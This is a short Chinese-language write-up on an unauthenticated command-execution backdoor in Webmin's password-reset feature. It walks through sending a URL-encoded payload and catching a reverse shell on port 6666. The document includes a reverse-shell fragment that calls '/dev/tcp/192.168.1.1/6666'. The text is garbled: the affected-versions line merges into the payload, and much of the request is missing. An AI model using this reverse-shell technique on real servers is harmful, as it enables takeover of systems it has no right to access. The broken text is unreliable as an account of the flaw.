漏洞描述
近日webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件,webmin是目前功能最强大的基于web的unix系统管理工具,管理员通过浏览器访问webmin的各种管理功能并完成相应的管理动作,当用户开启webmin密码重置功能后,攻击者可以通过发送请求在目标系统中执行任意命令,且无需身份验证。
影响范围:webmin & /dev/tcp/192.168.1.1/6666 0>&1” 接收shell服务器的6666端口)
那么的话,执行这个命令,那么我们服务器那边就要监听6666,接收反弹回来的shell。 这里的话,需要将payload进一方面的url编码再去执行
服务器那边监听6666端口接收反弹回来的shell可以看见我们执行的payload,右边的页面一片空白,就说明成功了。
然后就可以看见成功的反弹了一个shell过来了。
